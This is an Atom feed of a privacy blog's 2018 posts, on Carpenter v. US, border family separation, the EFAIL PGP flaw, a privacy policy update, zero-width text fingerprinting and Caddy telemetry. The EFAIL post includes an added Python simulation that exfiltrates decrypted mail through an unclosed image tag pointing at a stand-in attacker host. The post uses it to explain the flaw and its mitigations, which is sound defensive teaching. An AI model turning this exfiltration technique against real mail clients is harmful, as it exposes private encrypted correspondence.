<?xml version="1.0" encoding="utf-8"?>

<feed xmlns="http://www.w3.org/2005/Atom">

	<title xml:lang="en">Nefarious Laboratories</title>
	<subtitle type="html">Product Development &amp; Datametrics</subtitle>
	<rights>https://creativecommons.org/licenses/by-nc-sa/4.0/</rights>
	<link type="application/atom+xml" href="https://neflabs.com/atom.xml" rel="self" />
	<link type="text/html" href="https://neflabs.com/" />
	<icon>https://neflabs.com/assets/img/192.png</icon>
	<id>https://neflabs.com/</id>

	<updated>2018-06-25T00:00:00Z</updated>

	<entry>
		<title>Unpacking The Carpenter v. United States Decision</title>
		<link href="https://neflabs.com/blog/carptenter-v-us/" />
		<id>https://neflabs.com/blog/carptenter-v-us/</id>
		<updated>2018-06-25T00:00:00Z</updated>
		<summary>The Supreme Court found that law enforcement and US government agencies must obtain a warrant before requesting an individual's cell-site location information (CSLI). But there are caveats.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Privacy</span> advocates are <a href="https://www.eff.org/deeplinks/2018/06/victory-supreme-court-says-fourth-amendment-applies-cell-phone-tracking" target="_blank">cheering</a> the outcome of <a href="https://www.supremecourt.gov/opinions/17pdf/16-402_h315.pdf" target="_blank"><i>Carpenter v. United States</i></a>, in which the Supreme Court found that law enforcement and US government agencies must obtain a warrant before requesting an individual's cell-site location information (CSLI). However, in their 5-4 ruling, the justices explained,</p>

<p class="quote">This decision is narrow. It does not express a view on matters not before the Court; does not disturb the application of Smith and Miller or call into question conventional surveillance techniques and tools, such as security cameras; does not address other business records that might incidentally reveal location information; and does not consider other collection techniques involving foreign affairs or national security.</p>

<p>In his <a href="https://supreme.justia.com/cases/federal/us/585/16-402/dissent7.html" target="_blank">dissent</a> Justice Gorsuch objected to the arbitrary lines drawn by the ruling, which leaves open whether a warrant is needed for fewer than seven days of records and does not cover "tower dumps", a download of every device connected to a particular cell site, either in real time or over a specified period. The ruling also leaves untouched the private sale of CSLI to or among businesses, which may in turn hand over data to government agencies.</p>

<p>His opinion hardly deserves to be called a "dissent"; Gorsuch made strong arguments in favor of privacy, directly attacking the 1979 <a href="https://en.wikipedia.org/wiki/Third-party_doctrine" target="_blank">Third-Party Doctrine</a>, a legal precedent under which "a person has no legitimate expectation of privacy in information he voluntarily turns over to third parties."</p>

<p class="quote">Even taken on its own terms, Katz has never been sufficiently justified. In fact, we still don’t even know what its “reasonable expectation of privacy” test is. Is it supposed to pose an empirical question (what privacy expectations do people actually have) or a normative one (what expectations should they have)? Either way brings problems.<br /><br />

There is another way. From the founding until the 1960s, the right to assert a Fourth Amendment claim didn’t depend on your ability to appeal to a judge’s personal sensibilities about the “reasonableness” of your expectations of privacy. It was tied to the law.</p>

<p class="pause">Unwarranted Warrants</p>

<p>Despite the ruling, it remains remarkably easy for law enforcement to obtain warrants. The US FISA Court <a href="https://www.motherjones.com/crime-justice/2013/06/fisa-court-nsa-spying-opinion-reject-request/" target="_blank">approves</a> 99.97% of the surveillance applications it receives, and The Salt Lake Tribune <a href="https://www.sltrib.com/news/2018/01/14/warrants-approved-in-just-minutes-are-utah-judges-really-reading-them-before-signing-off/" target="_blank">found</a> Utah judges approving warrant requests in a matter of minutes. Today that includes digital "e-warrants", which allow law enforcement agencies to request warrants without standing before a judge.</p>

<p class="quote">This is how e-warrants work: Police officers write a description of their credentials and why they need access to whatever they want to search. Then they submit it digitally to the Utah Criminal Justice Information System. An on-call judge receives a text or email alert, and that can come at any hour of the day. The judge then reviews the warrant and makes a critical decision: Is there probable cause to believe a crime has been committed? If so, the judge hits a button, granting permission for the officer to seek the evidence.</p>

<p>Companies like <a href="https://cloudgavel.com" target="_blank">CloudGavel</a> (an "Amazon technology partner") provide e-warrant services, making it easy for law enforcement to adopt this technology with little state or municipal oversight. One might argue e-warrants simply make government more efficient, but warrants should not be efficient; they are supposed to protect our liberties through careful deliberation. The "slow" nature of the justice system is designed to prevent abuse of citizen rights.</p>

<p class="pause">No Victory</p>

<p>The <i>Carpenter v. United States</i> decision may prove useful in setting precedent for further cases, but do not mistake a razor-thin step forward for outright victory. Those who wish to maintain their personal privacy should consider their CSLI up for grabs in almost every circumstance.</p>

<p class="quote">Published June 25, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Introducing Privc.io, A Privacy News Service</title>
		<link href="https://neflabs.com/blog/introducing-privc/" />
		<id>https://neflabs.com/blog/introducing-privc/</id>
		<updated>2018-06-22T00:00:00Z</updated>
		<summary>Tired of visiting "all the sites" to get your privacy news? So were we. So we built our own news aggregator, at Privc.io</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Tired</span> of visiting "all the sites" to get your privacy news fix? So were we. So we built our own news aggregator, at <a href="https://privc.io" target="_blank">Privc.io</a> (pronounced "privacy dot io"). Headlines are refreshed every hour, on the hour.</p>

<p>This service is free, there are no ads, and we do not track visitors.</p>

<p class="quote">Published June 22, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>We Cannot Ignore Children In Cages</title>
		<link href="https://neflabs.com/blog/cannot-ignore/" />
		<id>https://neflabs.com/blog/cannot-ignore/</id>
		<updated>2018-06-20T00:00:00Z</updated>
		<summary>As a country, we have kidnapped children from their parents and imprisoned them. Our tax dollars pay our government to carry out these actions, our corporations directly contribute, and we are all culpable.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Human rights</span> abuses occur at an alarming rate. Today there are more <a href="https://www.alternet.org/civil-liberties/there-are-more-slaves-today-any-time-human-history" target="_blank">slaves</a> around the world than at any time in human history. News reports - of human trafficking, police brutality, and torture - assault our sense of empathy and compassion, leaving us frustrated and desperate for answers. "Not our fight" we say, retreating into our disconnected lives.</p>

<p>Our charge is data privacy, and we make an effort to separate our personal politics from our public conversations. But there are some human rights abuses so terrible they must be addressed, no matter the cost to our business or reputation.</p>

<p>I have heard people ask how we, as a country, allowed the forced relocation and incarceration of over one hundred thousand Japanese Americans, including orphaned infants, in internment <a href="https://en.wikipedia.org/wiki/Internment_of_Japanese_Americans" target="_blank">camps</a> for <i>four years</i>. How had we abandoned our moral principles on such a horrific level?</p>

<p>In 2014, the Guardian <a href="https://www.theguardian.com/world/2014/jul/09/us-immigration-undocumented-children-texas" target="_blank">reported</a> over 50,000 unaccompanied children crossed into the US, a 250% increase from 2010. At that time, minors were sent back across the border, "provided they are not potential human trafficking victims or have a possible asylum claim", or handed over to the Office of Refugee Resettlement (ORR). The ACLU <a href="https://www.aclu.org/news/unaccompanied-immigrant-children-report-serious-abuse-us-officials-during-detention" target="_blank">alleged</a> widespread abuse ("verbal, sexual and physical abuse; prolonged detention in squalid conditions; and a severe lack of essential necessities such as beds, food and water") at the hands of border officials.</p>

<p class="quote">The complaint describes Border Patrol agents denying necessary medical care to children as young as five-months-old, refusing to provide diapers for infants, confiscating and not returning legal documents and personal belongings, making racially-charged insults and death threats, and strip searching and shackling children in three-point restraints during transport.</p>

<p>In 2016, a US Senate <a href="https://www.hsgac.senate.gov/imo/media/doc/Majority%20&%20Minority%20Staff%20Report%20-%20Protecting%20Unaccompanied%20Alien%20Children%20from%20Trafficking%20and%20Other%20Abuses%202016-01-282.pdf" target="_blank">report</a> found the Department of Health and Human Services (HHS) had placed immigrant children into the hands of traffickers, and failed to conduct background checks.</p>

<p class="quote">The traffickers would threaten the victims and their family members with physical harm, and even death, if they did not work or surrender their entire paychecks. The traffickers punished another minor victim when he complained about working at the egg farm by moving him to a different trailer "that was unsanitary and unsafe, with no bed, no heat, no hot water, no working toilets, and vermin." The traffickers then called the minor victim’s father and threatened to shoot the father in the head if the minor victim did not work.</p>

<p>On May 7, US Attorney General Sessions <a href="https://www.justice.gov/opa/speech/attorney-general-sessions-delivers-remarks-association-state-criminal-investigative" target="_blank">announced</a> a new "zero tolerance" policy to forcibly separate illegal immigrants from their children, and to detain those children even in cases where their parents are sent back across the border. The policy has been criticized as a political tactic designed to force politicians to negotiate in favor of a proposed border wall.</p>

<p class="quote">If you are smuggling a child, then we will prosecute you and that child will be separated from you as required by law.  If you don’t like that, then don’t smuggle children over our border. In order to carry out these important new enforcement policies, I have sent 35 prosecutors to the Southwest and moved 18 immigration judges to the border.<br /><br />Attorney General Sessions, ASCIA 2018 Conference</p>

<p>Today there are some twelve thousand minors in HHS custody, many of them forcibly removed from their families. They are being held in makeshift <a href="https://www.nbcnews.com/news/amp/ncna884126" target="_blank">prisons</a> described as "cages" (concrete walls and steel fences). Children sleep on the floor, locked inside for 22 hours a day. As a country, we have kidnapped children from their parents and imprisoned them. Our tax dollars pay our government to carry out these actions, our corporations directly <a href="https://techcrunch.com/2018/06/18/microsoft-says-it-is-dismayed-by-the-forced-separation-of-migrant-families-at-the-border/" target="_blank">contribute</a>, and we are all culpable. If a country is judged by how it treats its most vulnerable, be they citizens or asylum seekers, we have failed the test.</p>

<p>One might argue for long-term solutions to our manufactured immigration "crisis" (end the drug war, reinstate asylum protections, provide a realistic path toward productive citizenship), but this detached and insensitive position glosses over the physical and emotional pain we are inflicting on innocent children right <i>now</i>. We do not have unlimited resources, but we plan to volunteer with the <a href="http://miracoalition.org/get-involved">MIRA Coalition</a> over the next few months, we plan to vote the proponents of this policy out of office, and we will continue this discussion whenever and wherever possible.</p>

<p class="pause">A Note About Microsoft</p>

<p>Let me preface by saying we have a strong bias against Microsoft. As a member of the NSA's <a href="https://en.wikipedia.org/wiki/PRISM_%28surveillance_program%29" target="_blank">PRISM</a> surveillance program, Microsoft's actions are antithetical to our data privacy mission. Their flagship product is, in our view, purposefully designed to <a href="http://techrights.org/wiki/index.php/Microsoft_and_the_NSA">spy</a> on its users.</p>

<p class="quote">Microsoft CEO Satya Nadella downplayed his company’s work with U.S. Immigration and Customs Enforcement in a company-wide email sent this evening, saying that Microsoft’s contract with ICE deals only with email, calendar, and messaging—not with separating children from their parents.</p>

<p>This morally bankrupt excuse bears a striking parallel to IBM, which once built computing machines explicitly for the Nazis (the machines were used to orchestrate the Holocaust, tracking oil supplies, train schedules for death camps, the victims themselves, and their bank accounts). In 1939, when confronted with the news that three million Jews would be killed in Poland, IBM's response was later described this way:</p>

<p class="quote">The German managers of IBM Berlin sent a letter to Thomas Watson ... that, due to the "situation," they need high-speed alphabetizing equipment. IBM wanted no paper trail, so an oral agreement was made, passed from New York to Geneva to Berlin, and those alphabetizers were approved by Watson, personally, before the end of the month.</p>

<p class="quote">Published June 20, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>The Institution Of Privacy Isn't Going Away</title>
		<link href="https://neflabs.com/blog/why-privacy-isnt/" />
		<id>https://neflabs.com/blog/why-privacy-isnt/</id>
		<updated>2018-06-14T00:00:00Z</updated>
		<summary>Silicon Valley "tech bros" like to tell us that privacy doesn't matter, but the true origin of modern privacy is an idea which has survived global war, economic depression, and erosion by governments and corporations.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Silicon Valley "tech bros"</span> like to tell us that <a href="https://www.theguardian.com/technology/2010/jan/11/facebook-privacy" target="_blank">privacy</a> <a href="https://arstechnica.com/tech-policy/2016/06/facebook-wins-privacy-case-against-belgiums-data-protection-authority/" target="_blank">doesn't</a> <a href="https://boingboing.net/2009/12/09/google-ceo-says-priv.html" target="_blank">matter</a> (while quietly profiting off those gullible enough to believe them) and our elected representatives frequently <a href="https://arstechnica.com/tech-policy/2017/04/dont-like-privacy-violations-dont-use-the-internet-gop-lawmaker-says/" target="_blank">parrot</a> their nonsense.</p>

<p>Earlier this week, the New Yorker <a href="https://www.newyorker.com/magazine/2018/06/18/why-do-we-care-so-much-about-privacy" target="_blank">published</a> <i>Why Do We Care So Much About Privacy?</i>, a book promotion dressed up like an editorial. Meandering its way through an examination of US legal precedent since the second industrial revolution, the author eventually concludes that <i>privacy</i> looks a lot like <i>liberty</i>. How profound.</p>

<p>More disturbingly, he asserts the American concept of privacy is merely a by-product of 1890s US law and subsequent clashes with technological progress. Rubbish. As a fundamental component of democracy, privacy is much more enduring. All modern democracies trace their roots to the Athenian state, c. 500 BC.</p>

<p class="quote">A completely new element is thus introduced into the constitution: private ownership. According to the size of their property in land, the rights and duties of the citizens of the state are now assessed, and in the same degree to which the classes based on property gain influence, the old groups of blood relationship lose it.<br /><br />Friedrich Engels, Origin of the Family, Private Property, and the State, 1884</p>

<p>Where there exists democratic capitalism, there must also exist the legal foundations of private ownership. This is the true origin of modern privacy, an idea which has survived global war, economic depression, and erosion by governments and corporations. Our personal privacy has come under attack throughout history, but privacy itself isn't "going away" any more than the production or consumption of goods.</p>

<p>And that, <i>The New Yorker</i>, is why we "care so much about privacy" - not for its legal precedents or its championed ideals, but because it is an institution which has shaped our world for some 2,500 years.</p>

<p class="quote">Published June 14, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>PGP Vulnerability In Email Clients</title>
		<link href="https://neflabs.com/blog/pgp-email-client/" />
		<id>https://neflabs.com/blog/pgp-email-client/</id>
		<updated>2018-05-14T00:00:00Z</updated>
		<summary>OpenPGP itself is not vulnerable to attack, but "EFAIL" affects users who ignore best practices for the sake of convenience, putting themselves and their conversation partners at risk.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Convenience</span> is often the enemy of security. OpenPGP offers end-to-end email encryption, and its implementers are quick to point out that the cryptography itself is sound. But early today researchers <a href="https://efail.de" target="_blank">announced</a> EFAIL, a vulnerability in <i>how PGP is used</i> by email clients, which can expose the plaintext of encrypted messages.</p>

<p class="pause">Who Is Vulnerable?</p>

<p>The described attack depends on the recipient's email client doing two things that go against best practice: 1) decrypting encrypted email automatically upon receipt, with no action from the user, and 2) rendering HTML content, including remotely loaded images, inside the email client.</p>

<p>An attacker who can obtain the encrypted message (e.g. by eavesdropping on network traffic, compromising an email account, or gaining remote access to a device) does not need to break the encryption. Instead, they wrap the original ciphertext inside HTML of their own and send the result back to the recipient. If the recipient's email client automatically decrypts the message and renders it as HTML, the decrypted text lands inside the attacker's markup and is sent to the attacker. This can be accomplished with a simple HTML image tag whose source URL is deliberately left unclosed: the decrypted text becomes part of that URL, and the client hands it over when it loads the "image" from the attacker's server.</p>
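<p>The following is an added example, written in Python for this page; it is not code from the EFAIL researchers or from any mail client. It simulates the image-tag exfiltration channel described above with a toy mail client whose three risky behaviours can be switched on and off. The attacker's host, the lookup table standing in for OpenPGP decryption, and the message text are all constructed for the demo.</p>

```python
from dataclasses import dataclass
from html.parser import HTMLParser

# Constructed for this example: the attacker's collector host and the victim's secret.
ATTACKER_HOST = "https://collector.example/"
PGP_HEADER = "-----BEGIN PGP MESSAGE-----"
SECRET = "Meet at the safe house at 9pm. Bring the documents."

# Stand-in for the recipient's OpenPGP decryption: one armored blob mapped to its
# plaintext.  Not a cipher; the attack never touches the cryptography.
_TOY_KEYRING = {
    PGP_HEADER + "\nhQEMA3x0y...\n-----END PGP MESSAGE-----": SECRET,
}


def toy_decrypt(part: str) -> str:
    return _TOY_KEYRING[part]


def attacker_wrap(intercepted_ciphertext: str) -> list:
    """The attacker's re-sent mail as three MIME body parts: part 1 opens an <img>
    whose src attribute is never closed, part 2 is the victim's original
    ciphertext, part 3 supplies the closing quote and bracket."""
    return ['<img src="' + ATTACKER_HOST, intercepted_ciphertext, '">']


def image_sources(html: str) -> list:
    """URLs an HTML renderer would request for the <img> tags in `html`."""
    class _Collector(HTMLParser):
        def __init__(self):
            super().__init__()
            self.urls = []

        def handle_starttag(self, tag, attrs):
            if tag == "img":
                self.urls += [v for k, v in attrs if k == "src" and v]

    collector = _Collector()
    collector.feed(html)
    return collector.urls


@dataclass
class MailClient:
    auto_decrypt: bool   # decrypt PGP parts as soon as the mail is opened
    load_remote: bool    # fetch remote images while rendering HTML
    isolate_parts: bool  # render each MIME part as its own HTML document

    def requested_urls(self, parts: list) -> list:
        """Remote URLs this client would contact when displaying `parts`."""
        if not self.load_remote:
            return []  # remote content disabled: nothing leaves the client
        rendered = [toy_decrypt(p) if self.auto_decrypt and p.startswith(PGP_HEADER) else p
                    for p in parts]
        # The vulnerable behaviour: every part is concatenated into ONE document,
        # so the attacker's unclosed tag swallows the decrypted text.
        documents = rendered if self.isolate_parts else ["".join(rendered)]
        return [url for doc in documents for url in image_sources(doc)]


def leaked_plaintext(urls: list) -> str:
    """Attacker side: what the collector host learns from the request path."""
    return "".join(u[len(ATTACKER_HOST):] for u in urls if u.startswith(ATTACKER_HOST))


if __name__ == "__main__":
    mail = attacker_wrap(next(iter(_TOY_KEYRING)))
    leaky = MailClient(auto_decrypt=True, load_remote=True, isolate_parts=False)
    print("vulnerable client leaks:", repr(leaked_plaintext(leaky.requested_urls(mail))))
    for fixed in (MailClient(True, False, False), MailClient(True, True, True),
                  MailClient(False, True, False)):
        print(fixed, "leaks:", repr(leaked_plaintext(fixed.requested_urls(mail))))
```

<p>Run as a script, the fully "convenient" client requests a URL ending in the decrypted sentence, while each of the three fixes on its own stops the plaintext from leaving: disabling remote content, rendering MIME parts in isolation, or not decrypting automatically. The last case is instructive: the image is still fetched, but the URL carries only the armored ciphertext the attacker already had.</p>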

<p class="pause">Keep It Simple</p>

<p>OpenPGP itself is not vulnerable to attack, but users who ignore best practices for the sake of convenience put themselves and their conversation partners at risk. As a general rule, we recommend users disable HTML rendering and remote-content loading in their email client, and decrypt messages manually, or in an application other than their email client.</p>

<p class="quote">Published May 14, 2018</p>

<p class="pause">Update May 15, 2018</p>

<p>We reached out to SecureDrop to <a href="https://securedrop.org/news/security-advisory-securedrop-and-efail-vulnerability/" target="_blank">confirm</a> their systems are not affected by the <i>EFAIL</i> vulnerability. Whistleblowers can continue to safely use their services.</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Notice: Privacy Policy Update</title>
		<link href="https://neflabs.com/blog/privacy-policy-update/" />
		<id>https://neflabs.com/blog/privacy-policy-update/</id>
		<updated>2018-05-04T00:00:00Z</updated>
		<summary>If you have questions regarding our new policy, please reach out to us. We're happy to clarify our statements, address your concerns, and throw shade on corporations with terrible privacy policies.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Later this month</span> the <a href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation" target="_blank">GDPR</a> will take effect, and in adhering to its legal provisions, we're taking the opportunity to update our <a href="/privacy">privacy policy</a>. These changes reflect our organizational operations and our ethical perspectives.</p>

<p class="pause">Notification of Changes</p>

<p class="quote">Rev I. In the event this Policy is updated, changes will be posted on the Site <b>no less than one week in advance</b> so users remain aware of information collected, how it is used, and under what circumstances, if any, it is disclosed.</p>

<p class="quote">Rev II. In the event this Policy is updated, changes will be posted on the Site <b>in detail</b> so users remain aware of information collected, how it is used, and under what circumstances, if any, it is disclosed.</p>

<p>The original language focused on the <i>timeliness</i> of informing users of policy changes, while our new language holds us to a higher standard of <i>explaining</i> the changes. We believe it is disingenuous to introduce a new privacy policy, even in advance, without a straightforward explanation.</p>

<p class="pause">Protection of Financial Information</p>

<p>We removed this section in its entirety. The Financial Services Modernization Act of 1999 does not apply to our products or services, and we neither collect nor provide financial information.</p>

<p class="pause">Information Collection</p>

<p class="quote">Rev I. For the purposes of your privacy, this website does not collect any visitor metadata. All server-side logging has been permanently disabled, preventing collection of data such as date and time of access. Personally identifiable information is only ever collected through the encrypted contact form. The Site was solely designed and developed <b>by Ethan Frederick Grant</b>, and does not employ <b>third-party software, javascript, or cookies</b>.</p>

<p class="quote">Rev II. To ensure your privacy, this website does not collect any visitor metadata. All server-side logging has been permanently disabled, preventing collection of data such as date and time of access. The Site was carefully developed <b>by hand</b>, and does not use <b>third-party software, analytics, or cookies</b>.</p>

<p>Language regarding the contact form was moved to <i>Protection of Communications</i> which we feel is now more comprehensive (see below). We also call attention to the fact that the site is coded by hand, each line of code written with privacy in mind. Lastly, we replaced the reference to "javascript" with "analytics" because the main menu and contact form both require a few lines of javascript. We believe the new language clarifies our opposition to the collection of analytics, rather than use of javascript generally.</p>

<p class="pause">Protection of Children</p>

<p class="quote">Rev I. In accordance with the <b>Children’s Online Privacy Protection Act of 1998</b>, NefLabs does not knowingly collect Information from persons under the age of <b>thirteen (13)</b>.</p>

<p class="quote">Rev II. In accordance with the <b>General Data Protection Regulation of 2018</b>, NefLabs does not knowingly collect Information from persons under the age of <b>sixteen (16)</b>.</p>

<p>The GDPR sets the default age of digital consent at sixteen (member states may lower it, but not below thirteen), which is stricter than COPPA's thirteen. In an effort to maintain policies which reflect the stricter standard, we are raising the minimum age of persons from whom we may collect information.</p>

<p class="pause">Protection of Communications</p>

<p class="quote">Rev I. In accordance with the Electronic Communications Privacy Act of 1986, and in an effort to protect Information from subpoena, all Site-related email messages older than <b>one-hundred eighty (180) days</b> are deleted. All Site-based communications are encrypted for your privacy. The Site has never received an order to disclose the private decryption key to these communications.</p>

<p class="quote">Rev II. Messages received through the contact form are anonymous. In accordance with the Electronic Communications Privacy Act of 1986, and in an effort to protect Information from subpoena, messages older than <b>seven (7) days</b> are deleted. For your privacy, all messages received through the contact form are encrypted at rest with a <b>rotating 4096-bit key</b>. The Site has never received an order to disclose the private decryption key to these communications.</p>

<p>This section was updated to more accurately reflect our organizational operations. To clarify, we do not collect "email" on the site; our contact form stores messages as encrypted text. The ECPA's 180-day line only changes how the government may compel disclosure (a subpoena rather than a warrant for older messages); we typically delete messages immediately after we receive them, and the new 7-day window is an honest reflection of our practices.</p>

<p>We also took the opportunity to clarify how messages received through the contact form are encrypted. Although messages are protected <i>in transit</i> using TLS 1.2, they are also encrypted <i>at rest</i> using a 4096-bit key, which is refreshed at random intervals.</p>

<p>If you have questions regarding our new policy, please reach out to us. We're happy to clarify our statements, address your concerns, and throw shade on corporations with terrible privacy policies.</p>

<p class="quote">Published May 04, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Introducing Fingertrap, For Whistleblowers</title>
		<link href="https://neflabs.com/blog/introducing-fingertrap/" />
		<id>https://neflabs.com/blog/introducing-fingertrap/</id>
		<updated>2018-05-01T00:00:00Z</updated>
		<summary>Employers are growing desperate to prevent information leaks, inserting zero-width (hidden) characters into documents. So we built Fingertrap, a tool for whistleblowers to identify digital fingerprinting in text documents.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Employers</span> are growing desperate to prevent information leaks. The latest trend involves inserting zero-width (hidden) characters into documents. Employees receive what appears to be the same document, but each contains a unique digital fingerprint. If the document is leaked, the employer can trace it back to the person who was given that unique version. See a real-time <a href="https://umpox.github.io/zero-width-detection/" target="_blank">example</a> from Tom Ross.</p>

<p>How can whistleblowers fight back? Last month, Marco Chiappetta built a Chrome <a href="https://github.com/chpmrc/zero-width-chrome-extension" target="_blank">extension</a> designed to replace zero-width characters with emoji. It's fun and funny, but it presents challenges for would-be whistleblowers: not every employee has administrative rights to install the Chrome browser or Chrome extensions at work, and it doesn't apply to content outside the browser, such as email.</p>

<p>So we built <a href="https://github.com/neflabs/fingertrap" target="_blank">Fingertrap</a>, comprised of 3 small files (110 kb) which can be put on a thumb drive or downloaded directly to the target computer. Users can paste any text into the tool, and it will identify fingerprinting characters in red.</p>
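<p>As an added example (written in Python for this page, not Fingertrap's own code), here is the whole cycle a whistleblower is up against: a constructed marking scheme that hides one bit of a recipient ID in each zero-width character, followed by the detection, decoding and stripping a tool like Fingertrap has to perform. The memo text, the recipient IDs and the bit-to-character mapping are assumptions made for the demo; real fingerprinting schemes vary.</p>

```python
import unicodedata
from typing import List, Optional, Tuple

# Code points that render as nothing in most fonts and so can carry a hidden
# per-recipient mark.  ZWJ and ZWNJ also occur legitimately (emoji sequences,
# Persian and Indic text), which is why a detector should show them, not drop them.
ZERO_WIDTH = frozenset(
    "\u200b"                    # ZERO WIDTH SPACE
    "\u200c"                    # ZERO WIDTH NON-JOINER
    "\u200d"                    # ZERO WIDTH JOINER
    "\u200e"                    # LEFT-TO-RIGHT MARK
    "\u200f"                    # RIGHT-TO-LEFT MARK
    "\u2060"                    # WORD JOINER
    "\u2061\u2062\u2063\u2064"  # invisible maths operators
    "\u180e"                    # MONGOLIAN VOWEL SEPARATOR
    "\u034f"                    # COMBINING GRAPHEME JOINER
    "\ufeff"                    # ZERO WIDTH NO-BREAK SPACE (BOM)
)
ZWSP, ZWNJ = "\u200b", "\u200c"   # the two symbols of the constructed marking scheme


def fingerprint(text: str, recipient_id: int, width: int = 8) -> str:
    """Constructed marking scheme (an assumption, not any vendor's): one invisible
    character per bit of recipient_id, each placed after a space so the marked copy
    looks identical to the original.  Bits left over go on the end."""
    bits = iter(format(recipient_id, f"0{width}b"))
    out = []
    for ch in text:
        out.append(ch)
        if ch == " ":
            bit = next(bits, None)
            if bit is not None:
                out.append(ZWNJ if bit == "1" else ZWSP)
    out.extend(ZWNJ if bit == "1" else ZWSP for bit in bits)
    return "".join(out)


def find_hidden(text: str) -> List[Tuple[int, str]]:
    """(offset, Unicode name) of every zero-width character in text."""
    return [(i, unicodedata.name(c, f"U+{ord(c):04X}"))
            for i, c in enumerate(text) if c in ZERO_WIDTH]


def highlight(text: str) -> str:
    """Make the invisible visible, the way a detector marks characters in red."""
    return "".join(f"[U+{ord(c):04X}]" if c in ZERO_WIDTH else c for c in text)


def decode_id(text: str) -> Optional[int]:
    """Recover the recipient id from a copy marked with fingerprint()."""
    marks = [c for c in text if c in (ZWSP, ZWNJ)]
    if not marks:
        return None
    return int("".join("1" if c == ZWNJ else "0" for c in marks), 2)


def strip_hidden(text: str, keep: frozenset = frozenset()) -> str:
    """Remove zero-width characters; pass keep=frozenset("\u200c\u200d") for
    text whose script genuinely needs joiners."""
    return "".join(c for c in text if c not in ZERO_WIDTH or c in keep)


if __name__ == "__main__":
    memo = "Q3 revenue will miss guidance; do not forward this memo outside finance."
    leaked = fingerprint(memo, recipient_id=178)
    print(highlight(leaked))
    print("hidden characters:", find_hidden(leaked))
    print("traced to recipient:", decode_id(leaked))
    print("clean copy identical to original:", strip_hidden(leaked) == memo)
```

<p>The marked memo and the original are indistinguishable on screen and differ only in length, so a leaker who compares what they see is none the wiser; the decoder recovers the recipient ID from the order of the invisible characters alone. Strip with care: blindly removing ZWJ and ZWNJ will corrupt emoji sequences and text in scripts that depend on joiners, so review what a detector flags before cleaning a document.</p>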

<p class="pause">You Can Help</p>

<p>Fingertrap is 100% free. Why? We believe payment information defeats user anonymity. No one should keep records of who uses our software, not even us. If you want to make a donation, sign up at our <a href="https://patreon.com/neflabs" target="_blank">Patreon</a> page, and help us continue to build and deliver free products.</p>

<p class="quote">Published May 01, 2018</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

	<entry>
		<title>Put A Fork In Caddy; It's Done</title>
		<link href="https://neflabs.com/blog/caddy-server/" />
		<id>https://neflabs.com/blog/caddy-server/</id>
		<updated>2018-04-30T00:00:00Z</updated>
		<summary>Caddy was supposed to be great: a modern web server configured for TLS and HTTP2 out of the box. But its only developer announced it will soon collect telemetry from its users by default.</summary>
		<content type="xhtml">
			<div xmlns="http://www.w3.org/1999/xhtml">
				<![CDATA[
<p><span class="start">Caddy</span> was supposed to be great: a modern web server configured for TLS and HTTP2 out of the box. Apache and Microsoft IIS (both from 1995) look like dinosaurs next to the modern application written in <i>Go</i>.</p>

<p><a href="https://en.wikipedia.org/wiki/Caddy_(web_server)" target="_blank">Caddy</a> is developed exclusively by Matt Holt. His online <a href="https://www.mormon.org/me/16dk" target="_blank">profile</a> reflects Caddy's <a href="https://caddyserver.com/sponsor" target="_blank">mission</a> to, "deliver security and privacy to millions of users across the world".</p>

<p class="quote">"Earning your trust is my most important interpersonal goal ... I do my best to always follow Christ's example and include Him in everything I do."</p>

<p class="pause">Double Trouble</p>

<p>But just days after the Facebook/Cambridge Analytica scandal, Matt shocked the community by <a href="https://caddy.community/t/caddy-0-11-will-have-telemetry-discuss/3610" target="_blank">announcing</a> the server software will soon collect <a href="https://www.technologyreview.com/s/514591/the-dictatorship-of-data/" target="_blank">telemetry</a> from its users by default. The community responded with frustration and disappointment:</p>

<p class="quote">"After the recent FaceBook fiasco I would have thought there would be more 'sensitivity' to thinking about privacy before jumping in with a de facto opt-in (and the potential that that choice brings)." - omz13</p>

<p class="quote">"While this feels more like a privacy issue than a security one, the whole opt-out thing just leaves me with a taste of 'Caddy is the HTTP/2 web server with automatic HTTPS. Now with added spying!'" - lucas</p>

<p class="quote">"I work with individuals using technology in oppressive regimes. What you're proposing, if not handled carefully, could literally have people imprisoned or murdered by their governments. We are just now embarking on a global debate over privacy. Respectfully, to implement default telemetry now ... is a slap in the face to many of us." - caddyhello</p>

<p>In our Weekly Privacy Discussion video, we called Matt out on his decision, and urged him to reconsider his stance for the sake of user privacy. User <i>caddyhello</i> posted a link to the video in the community thread on telemetry, twice. It was <a href="screenshot.png">removed</a> both times by Matt, claiming the video "does not add any value to the conversation".</p>

